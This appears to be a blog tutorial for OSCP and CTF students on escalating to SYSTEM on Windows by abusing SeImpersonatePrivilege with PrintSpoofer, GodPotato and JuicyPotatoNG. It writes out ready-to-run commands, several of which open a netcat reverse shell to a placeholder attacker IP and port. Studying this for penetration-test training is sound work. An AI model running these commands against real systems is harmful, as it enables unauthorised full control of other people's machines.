A Classic in the Windows Privilege Escalation Toolbox For OSCP Students

Note: I hate paywalls, and Medium does not allow freemium monetization on content. If you are not a paying Medium Member, read the article here for free.

Did you know that only around 10% of the readers give a clap? Surely, more people than that enjoy the content, so consider clicking the clap button a couple of times ;)

The Introduction

In this write-up, I will introduce an important privilege to look for on Windows: SeImpersonatePrivilege. It can be found by executing whoami /priv and which outputs the privileges of the current user. This looks like the output below:

If you are doing the OSCP or CTFs on this level, it is crucial to look for SeImpersonatePrivilegeand know how to handle it when you find it. When I trained for my OSCP, an early frustration was that everyone makes abusing this privilege sound trivial. It takes practice to get the abuse because it depends on some details behind the scenes, but if you keep at it, it gets very easy.

The nitty gritty details of why this privilege poses a security risk will not be covered here as it is out of scope of the OSCP. The short story is a proof of concept, JuicyPotato, abusing the vulnerability was made to showcase how dangerous the privilege is and how easy it is to do. This proof of concept uses named pipes and COM services to escalate to SYSTEM, which is the highest privilege you can get on Windows. You don't need more knowledge to execute the exploit, but if you want to dive deeper than that, you can have a look here:

The Attack

Tons of tools that can abuse this privilege and they all do similar tricks but not entirely. As such, some tools may work and others won't for any given target machine. My best suggestion is to get comfortable with a variety of tools and go through them one by one until you hit something that works. Here is my personal list.

PrintSpoofer

PrintSpoofer is a good way to abuse it. The first example requires an interactive shell. If you have access via RDP, you can pop open a terminal window and run:

./PrintSpoofer.exe -i -c cmd

And you should be good. If you have abused a web application via IIS or similar, your shell is likely not interactive, though. In that case, try run it like this:

./PrintSpoofer.exe -i -c "C:/Users/${user}/Desktop/nc.exe ${ATTACKER_IP} ${ATTACKER_PORT} -e cmd"

Note that this example requires you to transfer nc.exe to the victim machine in addition to the PrinterSpoofer.exe. The same goes for a few of the following examples.

GodPotato

Similar to the PrinterSpoofer example above, we can use nc.exe with GodPotato too:

./GodPotato -cmd "C:/Users/${user}/Desktop/nc.exe ${ATTACKER_IP} ${ATTACKER_PORT} -e cmd"

JuicyPotatoNG — My Favorite

JuicyPotatoNG has generally been the exploit tool that I had the most success with. So the more I trained on SeImpersonatePrivilege, the more I gravitated towards this one. I would usually try like this:

./JuicyPotatoNG.exe -t * -p "./nc.exe" -a "${ATTACKER_IP} ${ATTACKER_PORT} -e cmd"

Or alternatively with a shell.exe generated with Msfvenom:

./JuicyPotatoNG.exe -t * -p "./shell.exe"

That said, JuicyPotatoNG is not magic. It does not always work.

Conclusion

The first time I learned about SeImpersonatePrivilege I was hoping to find a single tool that always worked. I did not succeed in that goal. So my best piece of advice is to get comfortable with a variety of tools and go through them in order. That way, you will always find one that works.

If you want to follow me on X (Twitter), you can find me here:

Or if you have moved to BlueSky, like the rest of us:

If you want to join my mailing list to make sure you see all my write-ups, click here:

If you want to dive into my notes unorganized notes from the OSCP and other red-teaming exercises, feel free to have a look at my Github Repository with my notes here: